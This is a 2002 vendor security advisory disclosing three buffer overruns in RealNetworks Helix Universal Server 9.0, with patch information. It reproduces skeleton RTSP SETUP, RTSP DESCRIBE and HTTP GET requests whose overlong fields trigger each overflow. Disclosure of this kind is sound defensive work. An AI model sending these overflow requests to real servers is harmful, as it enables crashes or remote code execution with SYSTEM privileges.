NGSSoftware Insight Security Research Advisory Name: Muliple Buffer overruns RealNetworks Helix Universal Server 9.0 Systems Affected: Windows, FreeBSD, HP-UX, AIX, Linux, Sun Solaris 2.7 & 2.8 Severity: High Risk Category: Buffer Overrun Vendor URL: http://www.real.com/ Author: Mark Litchfield (mark@ngssoftware.com) Date: 20th December 2002 Advisory number: #NISR20122002 Description *********** According to REAL, the Helix Universal Server is the only universal platform with support for live and on-demand delivery of all major media file formats, including Real Media, Windows Media, QuickTime, MPEG 4, MP3, MPEG 2, and more. The Helix server is vulnerable to multiple buffer overrun vulnerabilities. Previous versions were not tested but it is assumed that they too may be vulnerable. Details ******* The Helix server uses the RTSP protocol, which is based upon HTTP. Vulnerability One: By supplying an overly long character string within the Transport field of a SETUP RSTP request to a Helix server, which by default listens on TCP port 554, an overflow will occur overwriting the saved return address on the stack. On a windows box, the Helix server is installed by default as a system service and so exploitation of this vulnerability would result in a complete server compromise, with supplied code executing in the security context of SYSTEM. The impact of these vulnerabilities on UNIX based platforms was not tested, though they are vulnerable. SETUP rtsp://www.ngsconsulting.com:554/real9video.rm RTSP/1.0 CSeq: 302 Transport: AAAAAAAAA--> Vulnerability Two: By supplying a very long URL in the Describe field, again over port 554, an attacker can overwrite the saved return address allowing the execution of code DESCRIBE rtsp://www.ngsconsulting.com:554/AAAAAAAA-->.smi RTSP/1.0 CSeq: 2 Accept: application/sdp Session: 4668-1 Bandwidth: 393216 ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK Cookie: cbid=www.ngsconsulting.com GUID: 00000000-0000-0000-0000-000000000000 Language: en-us PlayerCookie: cbid RegionData: myregion Require: com.real.retain-entity-for-setup SupportsMaximumASMBandwidth: 1 Vulnerability Three: By making two HTTP requests (port 80) containing long URI's simultaneously, (in making the first connection, it will appear to hang, by keeping this session open and making another connection and supplying the same request again ), will cause the saved return address to also be overwritten, allowing an attacker to run arbitrary code of their choosing. GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0 User-Agent: RealPlayer G2 Expires: Mon, 18 May 1974 00:00:00 GMT Pragma: no-cache Accept: application/x-rtsp-tunnelled, */* ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK Cookie: cbid=dfjgimiidjcfllgheokrqprqqojrptnpikcjkioigjdkfiplqniomprtkronoqmuekigihd i X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt Fix Information *************** NGSSoftware alerted REALNetworks to theses issues on 8/11/2002, 30/11/2002, 12/11/2002 respectively. A patch has now been made available from http://www.service.real.com/help/faq/security/bufferoverrun12192002.html A check for these issues has been added to Typhon III, of which more information is available from the NGSSoftware website, http://www.ngssoftware.com. Further Information ******************* For further information about the scope and effects of buffer overflows, please see http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf About NGSSoftware ***************** NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware's sister company NGSConsulting, offers best of breed security consulting services, specialising in application, host and network security assessments. http://www.ngssoftware.com/ http://www.ngsconsulting.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 enquiries@ngssoftware.com